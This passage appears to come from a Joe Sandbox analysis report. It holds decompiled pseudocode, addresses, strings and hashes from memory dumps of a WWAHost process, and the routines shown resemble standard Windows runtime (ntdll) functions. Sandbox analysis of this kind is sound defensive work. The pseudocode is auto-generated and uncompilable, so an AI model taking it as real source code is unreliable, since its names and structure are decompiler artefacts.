                                              																							_t40 = _t177 + 0x20;
                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                              																							__eflags =  *_t40;
                                              																						}
                                              																					}
                                              																				}
                                              																				goto L31;
                                              																			}
                                              																		}
                                              																	}
                                              																}
                                              															}
                                              														}
                                              													} else {
                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                              														_t106 =  *(_t147 + 0x20);
                                              														__eflags = _t106 & 0x00000040;
                                              														if((_t106 & 0x00000040) != 0) {
                                              															_t147 = E0398FD22(_t147);
                                              															__eflags = _t147;
                                              															if(_t147 == 0) {
                                              																L41:
                                              																_t130 = 0xc0000001;
                                              																L32:
                                              																_t77 = _t130;
                                              																goto L33;
                                              															} else {
                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                              																_t106 =  *(_t147 + 0x20);
                                              																goto L17;
                                              															}
                                              															goto L35;
                                              														} else {
                                              															L17:
                                              															_t108 = _t106 | 0x00000080;
                                              															__eflags = _t108;
                                              															 *(_t147 + 0x20) = _t108;
                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                              															goto L18;
                                              														}
                                              													}
                                              												}
                                              											}
                                              											L33:
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						L35:
                                              						return _t77;
                                              					} else {
                                              						 *_t75 = 0x3a47b80;
                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                              						 *_t134 = _t75;
                                              						 *0x3a47b84 = _t75;
                                              						_t73 = E0396EB70(_t134, 0x3a47b60);
                                              						if( *0x3a47b20 != 0) {
                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                              								_t73 = E0396FF60( *0x3a47b20);
                                              							}
                                              						}
                                              						goto L5;
                                              					}
                                              				}
                                              			}
                                              0x0398fcb4
                                              0x0398fcb6
                                              0x0398fcdc
                                              0x0398fcdc
                                              0x00000000
                                              0x0398fcb8
                                              0x0398fcc3
                                              0x0398fcc5
                                              0x0398fcc7
                                              0x00000000
                                              0x0398fcc9
                                              0x0398fcc9
                                              0x0398fccd
                                              0x00000000
                                              0x0398fccd
                                              0x0398fcc7
                                              0x00000000
                                              0x0398fc4b
                                              0x0398fc4b
                                              0x0398fc4e
                                              0x0398fc4e
                                              0x0398fc51
                                              0x0398fc51
                                              0x0398fc54
                                              0x0398fc5a
                                              0x0398fc5c
                                              0x0398fc5f
                                              0x0398fc61
                                              0x0398fc63
                                              0x0398fc65
                                              0x0398fc67
                                              0x0398fc6e
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc72
                                              0x0398fc67
                                              0x0398fc61
                                              0x00000000
                                              0x0398fc5a
                                              0x0398fc49
                                              0x0398fc41
                                              0x0398fc30
                                              0x0398fc27
                                              0x0398fc03
                                              0x0398fbcd
                                              0x0398fbd3
                                              0x0398fbd9
                                              0x0398fbdc
                                              0x0398fbde
                                              0x0398fc99
                                              0x0398fc9b
                                              0x0398fc9d
                                              0x0398fcd5
                                              0x0398fcd5
                                              0x0398fc89
                                              0x0398fc89
                                              0x00000000
                                              0x0398fc9f
                                              0x0398fc9f
                                              0x0398fca3
                                              0x00000000
                                              0x0398fca3
                                              0x00000000
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe4
                                              0x0398fbe9
                                              0x0398fbf2
                                              0x00000000
                                              0x0398fbf2
                                              0x0398fbde
                                              0x0398fbcb
                                              0x0398fbab
                                              0x0398fc8b
                                              0x0398fc8b
                                              0x0398fc8c
                                              0x0398fb80
                                              0x0398fb72
                                              0x0398fb5e
                                              0x0398fc8d
                                              0x0398fc91
                                              0x0398fadf
                                              0x0398fadf
                                              0x0398fae1
                                              0x0398fae4
                                              0x0398fae7
                                              0x0398faec
                                              0x0398faf8
                                              0x0398fb00
                                              0x0398fb07
                                              0x0398fb0f
                                              0x0398fb0f
                                              0x0398fb07
                                              0x00000000
                                              0x0398faf8
                                              0x0398fadd

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 039CBE0F
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: cbf08550d1f07720b85463379b2da90ee30aec92ca7c2810642ca18a5cab58b6
                                              • Instruction ID: aa868f02cc5bcd704a3a494261d45c7db6706b9b1cf4f5c46413e174a1df72e2
                                              • Opcode Fuzzy Hash: cbf08550d1f07720b85463379b2da90ee30aec92ca7c2810642ca18a5cab58b6
                                              • Instruction Fuzzy Hash: 85A11376B10746CBDB25EF68D450B7AB3A8AFC8750F0849ADE907DB680DB30D941CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 63%
                                              			E03952D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                              				signed char _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				signed int _v52;
                                              				void* __esi;
                                              				void* __ebp;
                                              				intOrPtr _t55;
                                              				signed int _t57;
                                              				signed int _t58;
                                              				char* _t62;
                                              				signed char* _t63;
                                              				signed char* _t64;
                                              				signed int _t67;
                                              				signed int _t72;
                                              				signed int _t77;
                                              				signed int _t78;
                                              				signed int _t88;
                                              				intOrPtr _t89;
                                              				signed char _t93;
                                              				signed int _t97;
                                              				signed int _t98;
                                              				signed int _t102;
                                              				signed int _t103;
                                              				intOrPtr _t104;
                                              				signed int _t105;
                                              				signed int _t106;
                                              				signed char _t109;
                                              				signed int _t111;
                                              				void* _t116;
                                              
                                              				_t102 = __edi;
                                              				_t97 = __edx;
                                              				_v12 = _v12 & 0x00000000;
                                              				_t55 =  *[fs:0x18];
                                              				_t109 = __ecx;
                                              				_v8 = __edx;
                                              				_t86 = 0;
                                              				_v32 = _t55;
                                              				_v24 = 0;
                                              				_push(__edi);
                                              				if(__ecx == 0x3a45350) {
                                              					_t86 = 1;
                                              					_v24 = 1;
                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                              				}
                                              				_t103 = _t102 | 0xffffffff;
                                              				if( *0x3a47bc8 != 0) {
                                              					_push(0xc000004b);
                                              					_push(_t103);
                                              					E039997C0();
                                              				}
                                              				if( *0x3a479c4 != 0) {
                                              					_t57 = 0;
                                              				} else {
                                              					_t57 = 0x3a479c8;
                                              				}
                                              				_v16 = _t57;
                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                              					_t93 = _t109;
                                              					L23();
                                              				}
                                              				_t58 =  *_t109;
                                              				if(_t58 == _t103) {
                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                              					_t58 = _t103;
                                              					if(__eflags == 0) {
                                              						_t93 = _t109;
                                              						E03981624(_t86, __eflags);
                                              						_t58 =  *_t109;
                                              					}
                                              				}
                                              				_v20 = _v20 & 0x00000000;
                                              				if(_t58 != _t103) {
                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                              				}
                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                              				_t88 = _v16;
                                              				_v28 = _t104;
                                              				L9:
                                              				while(1) {
                                              					if(E03977D50() != 0) {
                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                              					} else {
                                              						_t62 = 0x7ffe0382;
                                              					}
                                              					if( *_t62 != 0) {
                                              						_t63 =  *[fs:0x30];
                                              						__eflags = _t63[0x240] & 0x00000002;
                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                              							_t93 = _t109;
                                              							E039EFE87(_t93);
                                              						}
                                              					}
                                              					if(_t104 != 0xffffffff) {
                                              						_push(_t88);
                                              						_push(0);
                                              						_push(_t104);
                                              						_t64 = E03999520();
                                              						goto L15;
                                              					} else {
                                              						while(1) {
                                              							_t97 =  &_v8;
                                              							_t64 = E0398E18B(_t109 + 4, _t97, 4, _t88, 0);
                                              							if(_t64 == 0x102) {
                                              								break;
                                              							}
                                              							_t93 =  *(_t109 + 4);
                                              							_v8 = _t93;
                                              							if((_t93 & 0x00000002) != 0) {
                                              								continue;
                                              							}
                                              							L15:
                                              							if(_t64 == 0x102) {
                                              								break;
                                              							}
                                              							_t89 = _v24;
                                              							if(_t64 < 0) {
                                              								L039ADF30(_t93, _t97, _t64);
                                              								_push(_t93);
                                              								_t98 = _t97 | 0xffffffff;
                                              								__eflags =  *0x3a46901;
                                              								_push(_t109);
                                              								_v52 = _t98;
                                              								if( *0x3a46901 != 0) {
                                              									_push(0);
                                              									_push(1);
                                              									_push(0);
                                              									_push(0x100003);
                                              									_push( &_v12);
                                              									_t72 = E03999980();
                                              									__eflags = _t72;
                                              									if(_t72 < 0) {
                                              										_v12 = _t98 | 0xffffffff;
                                              									}
                                              								}
                                              								asm("lock cmpxchg [ecx], edx");
                                              								_t111 = 0;
                                              								__eflags = 0;
                                              								if(0 != 0) {
                                              									__eflags = _v12 - 0xffffffff;
                                              									if(_v12 != 0xffffffff) {
                                              										_push(_v12);
                                              										E039995D0();
                                              									}
                                              								} else {
                                              									_t111 = _v12;
                                              								}
                                              								return _t111;
                                              							} else {
                                              								if(_t89 != 0) {
                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                              									_t77 = E03977D50();
                                              									__eflags = _t77;
                                              									if(_t77 == 0) {
                                              										_t64 = 0x7ffe0384;
                                              									} else {
                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                              									}
                                              									__eflags =  *_t64;
                                              									if( *_t64 != 0) {
                                              										_t64 =  *[fs:0x30];
                                              										__eflags = _t64[0x240] & 0x00000004;
                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                              											_t78 = E03977D50();
                                              											__eflags = _t78;
                                              											if(_t78 == 0) {
                                              												_t64 = 0x7ffe0385;
                                              											} else {
                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                              											}
                                              											__eflags =  *_t64 & 0x00000020;
                                              											if(( *_t64 & 0x00000020) != 0) {
                                              												_t64 = E039D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                              											}
                                              										}
                                              									}
                                              								}
                                              								return _t64;
                                              							}
                                              						}
                                              						_t97 = _t88;
                                              						_t93 = _t109;
                                              						E039EFDDA(_t97, _v12);
                                              						_t105 =  *_t109;
                                              						_t67 = _v12 + 1;
                                              						_v12 = _t67;
                                              						__eflags = _t105 - 0xffffffff;
                                              						if(_t105 == 0xffffffff) {
                                              							_t106 = 0;
                                              							__eflags = 0;
                                              						} else {
                                              							_t106 =  *(_t105 + 0x14);
                                              						}
                                              						__eflags = _t67 - 2;
                                              						if(_t67 > 2) {
                                              							__eflags = _t109 - 0x3a45350;
                                              							if(_t109 != 0x3a45350) {
                                              								__eflags = _t106 - _v20;
                                              								if(__eflags == 0) {
                                              									_t93 = _t109;
                                              									E039EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                              								}
                                              							}
                                              						}
                                              						_push("RTL: Re-Waiting\n");
                                              						_push(0);
                                              						_push(0x65);
                                              						_v20 = _t106;
                                              						E039E5720();
                                              						_t104 = _v28;
                                              						_t116 = _t116 + 0xc;
                                              						continue;
                                              					}
                                              				}
                                              			}




































                                              0x039afa2a
                                              0x039afa2a
                                              0x039afa2a
                                              0x039afa31
                                              0x039afa34
                                              0x039afa36
                                              0x039afa3c
                                              0x039afa3e
                                              0x039afa41
                                              0x039afa43
                                              0x039afa45
                                              0x039afa45
                                              0x039afa41
                                              0x039afa3c
                                              0x039afa4a
                                              0x039afa4f
                                              0x039afa51
                                              0x039afa53
                                              0x039afa56
                                              0x039afa5b
                                              0x039afa5e
                                              0x00000000
                                              0x039afa5e
                                              0x03952e23

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: a6ec4fc459f88b5a2edf1458b2cd704f757e2154eecb952e6617a677234462c8
                                              • Instruction ID: 12f4eb7035cf38baab48efa9a49b19a6afd5f2ba020977b437dab59cfe73da70
                                              • Opcode Fuzzy Hash: a6ec4fc459f88b5a2edf1458b2cd704f757e2154eecb952e6617a677234462c8
                                              • Instruction Fuzzy Hash: 2E612A31A00B449FEB31DF6CC884B7EB7A9EB85754F180AA9E8529B2C0D7349D85C7D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 80%
                                              			E03A20EA5(void* __ecx, void* __edx) {
                                              				signed int _v20;
                                              				char _v24;
                                              				intOrPtr _v28;
                                              				unsigned int _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				char _v44;
                                              				intOrPtr _v64;
                                              				void* __ebx;
                                              				void* __edi;
                                              				signed int _t58;
                                              				unsigned int _t60;
                                              				intOrPtr _t62;
                                              				char* _t67;
                                              				char* _t69;
                                              				void* _t80;
                                              				void* _t83;
                                              				intOrPtr _t93;
                                              				intOrPtr _t115;
                                              				char _t117;
                                              				void* _t120;
                                              
                                              				_t83 = __edx;
                                              				_t117 = 0;
                                              				_t120 = __ecx;
                                              				_v44 = 0;
                                              				if(E03A1FF69(__ecx,  &_v44,  &_v32) < 0) {
                                              					L24:
                                              					_t109 = _v44;
                                              					if(_v44 != 0) {
                                              						E03A21074(_t83, _t120, _t109, _t117, _t117);
                                              					}
                                              					L26:
                                              					return _t117;
                                              				}
                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                              				_t5 = _t83 + 1; // 0x1
                                              				_v36 = _t5 << 0xc;
                                              				_v40 = _t93;
                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                              				asm("sbb ebx, ebx");
                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                              				if(_t58 != 0) {
                                              					_push(0);
                                              					_push(0x14);
                                              					_push( &_v24);
                                              					_push(3);
                                              					_push(_t93);
                                              					_push(0xffffffff);
                                              					_t80 = E03999730();
                                              					_t115 = _v64;
                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                              						_push(_t93);
                                              						E03A1A80D(_t115, 1, _v20, _t117);
                                              						_t83 = 4;
                                              					}
                                              				}
                                              				if(E03A1A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                              					goto L24;
                                              				}
                                              				_t60 = _v32;
                                              				_t97 = (_t60 != 0x100000) + 1;
                                              				_t83 = (_v44 -  *0x3a48b04 >> 0x14) + (_v44 -  *0x3a48b04 >> 0x14);
                                              				_v28 = (_t60 != 0x100000) + 1;
                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                              				_v40 = _t62;
                                              				if(_t83 >= _t62) {
                                              					L10:
                                              					asm("lock xadd [eax], ecx");
                                              					asm("lock xadd [eax], ecx");
                                              					if(E03977D50() == 0) {
                                              						_t67 = 0x7ffe0380;
                                              					} else {
                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              					}
                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              						E03A1138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                              					}
                                              					if(E03977D50() == 0) {
                                              						_t69 = 0x7ffe0388;
                                              					} else {
                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              					}
                                              					if( *_t69 != 0) {
                                              						E03A0FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                              					}
                                              					if(( *0x3a48724 & 0x00000008) != 0) {
                                              						E03A152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                              					}
                                              					_t117 = _v44;
                                              					goto L26;
                                              				}
                                              				while(E03A215B5(0x3a48ae4, _t83, _t97, _t97) >= 0) {
                                              					_t97 = _v28;
                                              					_t83 = _t83 + 2;
                                              					if(_t83 < _v40) {
                                              						continue;
                                              					}
                                              					goto L10;
                                              				}
                                              				goto L24;
                                              			}

























                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 61db3da4e38063b9939675d5c856a02851d5a835cb3764efcd0d79990d52fb71
                                              • Instruction ID: d4cb4536b86e6351f2b9b4cadd23fd0dc868ebc909793e79e5c6653b3923c628
                                              • Opcode Fuzzy Hash: 61db3da4e38063b9939675d5c856a02851d5a835cb3764efcd0d79990d52fb71
                                              • Instruction Fuzzy Hash: 3851B1752083919FD324DF2DD980B1BBBE5EBC4704F04092EF9969B290D775E806C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E0398F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				char* _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				intOrPtr _v32;
                                              				char _v36;
                                              				char _v44;
                                              				char _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				intOrPtr _v72;
                                              				void* _t51;
                                              				void* _t58;
                                              				signed short _t82;
                                              				short _t84;
                                              				signed int _t91;
                                              				signed int _t100;
                                              				signed short* _t103;
                                              				void* _t108;
                                              				intOrPtr* _t109;
                                              
                                              				_t103 = __ecx;
                                              				_t82 = __edx;
                                              				_t51 = E03974120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                              				if(_t51 >= 0) {
                                              					_push(0x21);
                                              					_push(3);
                                              					_v56 =  *0x7ffe02dc;
                                              					_v20 =  &_v52;
                                              					_push( &_v44);
                                              					_v28 = 0x18;
                                              					_push( &_v28);
                                              					_push(0x100020);
                                              					_v24 = 0;
                                              					_push( &_v60);
                                              					_v16 = 0x40;
                                              					_v12 = 0;
                                              					_v8 = 0;
                                              					_t58 = E03999830();
                                              					_t87 =  *[fs:0x30];
                                              					_t108 = _t58;
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                              					if(_t108 < 0) {
                                              						L11:
                                              						_t51 = _t108;
                                              					} else {
                                              						_push(4);
                                              						_push(8);
                                              						_push( &_v36);
                                              						_push( &_v44);
                                              						_push(_v60);
                                              						_t108 = E03999990();
                                              						if(_t108 < 0) {
                                              							L10:
                                              							_push(_v60);
                                              							E039995D0();
                                              							goto L11;
                                              						} else {
                                              							_t109 = L03974620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                              							if(_t109 == 0) {
                                              								_t108 = 0xc0000017;
                                              								goto L10;
                                              							} else {
                                              								_t21 = _t109 + 0x18; // 0x18
                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                              								 *_t109 = 1;
                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                              								 *(_t109 + 0xe) = _t82;
                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                              								E0399F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                              								_t91 =  *_t103 & 0x0000ffff;
                                              								_t100 = _t91 & 0xfffffffe;
                                              								_t84 = 0x5c;
                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                              										_push(_v60);
                                              										E039995D0();
                                              										L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                              										_t51 = 0xc0000106;
                                              									} else {
                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                              										goto L5;
                                              									}
                                              								} else {
                                              									L5:
                                              									 *_a4 = _t109;
                                              									_t51 = 0;
                                              								}
                                              							}
                                              						}
                                              					}
                                              				}
                                              				return _t51;
                                              			}


























                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: d8e15724655c172d1050f86f82b1ebd1b7fdeb1dccace69ce7f609808758718f
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: A9517F755047109FD320DF59C841A6BBBF8FF88750F00892EF9969B690E774E914CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 75%
                                              			E039D3540(intOrPtr _a4) {
                                              				signed int _v12;
                                              				intOrPtr _v88;
                                              				intOrPtr _v92;
                                              				char _v96;
                                              				char _v352;
                                              				char _v1072;
                                              				intOrPtr _v1140;
                                              				intOrPtr _v1148;
                                              				char _v1152;
                                              				char _v1156;
                                              				char _v1160;
                                              				char _v1164;
                                              				char _v1168;
                                              				char* _v1172;
                                              				short _v1174;
                                              				char _v1176;
                                              				char _v1180;
                                              				char _v1192;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				short _t41;
                                              				short _t42;
                                              				intOrPtr _t80;
                                              				intOrPtr _t81;
                                              				signed int _t82;
                                              				void* _t83;
                                              
                                              				_v12 =  *0x3a4d360 ^ _t82;
                                              				_t41 = 0x14;
                                              				_v1176 = _t41;
                                              				_t42 = 0x16;
                                              				_v1174 = _t42;
                                              				_v1164 = 0x100;
                                              				_v1172 = L"BinaryHash";
                                              				_t81 = E03990BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                              				if(_t81 < 0) {
                                              					L11:
                                              					_t75 = _t81;
                                              					E039D3706(0, _t81, _t79, _t80);
                                              					L12:
                                              					if(_a4 != 0xc000047f) {
                                              						E0399FA60( &_v1152, 0, 0x50);
                                              						_v1152 = 0x60c201e;
                                              						_v1148 = 1;
                                              						_v1140 = E039D3540;
                                              						E0399FA60( &_v1072, 0, 0x2cc);
                                              						_push( &_v1072);
                                              						E039ADDD0( &_v1072, _t75, _t79, _t80, _t81);
                                              						E039E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                              						_push(_v1152);
                                              						_push(0xffffffff);
                                              						E039997C0();
                                              					}
                                              					return E0399B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                              				}
                                              				_t79 =  &_v352;
                                              				_t81 = E039D3971(0, _a4,  &_v352,  &_v1156);
                                              				if(_t81 < 0) {
                                              					goto L11;
                                              				}
                                              				_t75 = _v1156;
                                              				_t79 =  &_v1160;
                                              				_t81 = E039D3884(_v1156,  &_v1160,  &_v1168);
                                              				if(_t81 >= 0) {
                                              					_t80 = _v1160;
                                              					E0399FA60( &_v96, 0, 0x50);
                                              					_t83 = _t83 + 0xc;
                                              					_push( &_v1180);
                                              					_push(0x50);
                                              					_push( &_v96);
                                              					_push(2);
                                              					_push( &_v1176);
                                              					_push(_v1156);
                                              					_t81 = E03999650();
                                              					if(_t81 >= 0) {
                                              						if(_v92 != 3 || _v88 == 0) {
                                              							_t81 = 0xc000090b;
                                              						}
                                              						if(_t81 >= 0) {
                                              							_t75 = _a4;
                                              							_t79 =  &_v352;
                                              							E039D3787(_a4,  &_v352, _t80);
                                              						}
                                              					}
                                              					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                              				}
                                              				_push(_v1156);
                                              				E039995D0();
                                              				if(_t81 >= 0) {
                                              					goto L12;
                                              				} else {
                                              					goto L11;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: BinaryHash
                                              • API String ID: 2994545307-2202222882
                                              • Opcode ID: 53aa2a772beae86f4317f87d9852f7876f246b09dfd49f69c0156ad8d42923b8
                                              • Instruction ID: c998ae00f7f024d4af8414dc38fea1b3da28b78fa209359883c2781746f5d863
                                              • Opcode Fuzzy Hash: 53aa2a772beae86f4317f87d9852f7876f246b09dfd49f69c0156ad8d42923b8
                                              • Instruction Fuzzy Hash: 4F4154B6D0162C9BDF21DA54CC81FEEB77CAB44715F0085E5EA09AB240DB309E88CF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 71%
                                              			E03A205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				char _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				void* __ebx;
                                              				void* _t35;
                                              				signed int _t42;
                                              				char* _t48;
                                              				signed int _t59;
                                              				signed char _t61;
                                              				signed int* _t79;
                                              				void* _t88;
                                              
                                              				_v28 = __edx;
                                              				_t79 = __ecx;
                                              				if(E03A207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                              					L13:
                                              					_t35 = 0;
                                              					L14:
                                              					return _t35;
                                              				}
                                              				_t61 = __ecx[1];
                                              				_t59 = __ecx[0xf];
                                              				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                              				_v36 = _a8 << 0xc;
                                              				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                              				asm("sbb esi, esi");
                                              				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                              				if(_t42 != 0) {
                                              					_push(0);
                                              					_push(0x14);
                                              					_push( &_v24);
                                              					_push(3);
                                              					_push(_t59);
                                              					_push(0xffffffff);
                                              					if(E03999730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                              						_push(_t61);
                                              						E03A1A80D(_t59, 1, _v20, 0);
                                              						_t88 = 4;
                                              					}
                                              				}
                                              				_t35 = E03A1A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                              				if(_t35 < 0) {
                                              					goto L14;
                                              				}
                                              				E03A21293(_t79, _v40, E03A207DF(_t79, _v28,  &_a4,  &_a8, 1));
                                              				if(E03977D50() == 0) {
                                              					_t48 = 0x7ffe0380;
                                              				} else {
                                              					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                              				}
                                              				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                              					E03A1138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                              				}
                                              				goto L13;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
